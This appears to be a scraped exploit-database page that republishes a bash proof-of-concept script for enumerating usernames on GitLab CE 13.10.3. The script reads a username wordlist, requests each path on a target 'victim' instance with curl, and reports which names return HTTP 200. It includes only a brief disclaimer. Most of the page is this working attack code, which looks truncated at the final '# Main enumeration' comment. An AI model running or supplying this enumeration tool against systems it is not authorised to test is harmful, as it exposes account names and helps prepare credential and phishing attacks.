Registergitlab community edition (ce) 13.10.3 user enumeration
▸▸▸ Exploit & Vulnerability >> webapps exploit & ruby vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 #!/bin/bash #Colors RED='\033[38;5;196m' GREEN='\e[38;5;47m' NC='\033[0m' BOLD='\e[1m' PINK='\e[38;5;198m' Italic='\e[3m' BBlue='\e[44m' YELLOW='\033[0;33m' clear echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" echo -e " ${BOLD}Version 1.0${NC}\n" echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" echo -e "right permission is totally on your own risk.\n${NC}" echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" # Usage usage() { echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n" echo -e "${Italic}PARAMETERS:${NC}" echo -e "-------------" echo -e "-u/--url The URL of your victim's GitLab instance" echo -e "--userlist Path to a username wordlist file (one per line)" echo -e "-h/--help Show this help message and exit" echo -e "\n" echo -e "${Italic}Example:${NC}" echo -e "-------------" echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" } #check for params args=("$@") URL="" user_list="" for (( i=0; i < $#; i++)) { case ${args[$i]} in --url | -u) #GitLab's URL URL=${args[$((i+1))]} ;; --userlist) #Username wordlist user_list=${args[$((i+1))]} ;; -h | --help | "") #Help Menu usage exit 0 ;; esac } ## checking the mandatory parameter (URL) if [ -z "$URL" ] then usage echo "" echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" exit 0 fi # User Enumeration Function enumeration(){ while IFS= read -r line do echo "LOOP" HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) echo $HTTP_Code #echo "\n" if [ $HTTP_Code -eq 200 ] then echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" #check the connection elif [ $HTTP_Code -eq 000 ] then echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" exit 0 fi done < "$user_list" } # Main enumeration
Gitlab community edition (ce) 13.10.3 user enumeration Vulnerability / Exploit Source : Gitlab community edition (ce) 13.10.3 user enumeration
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes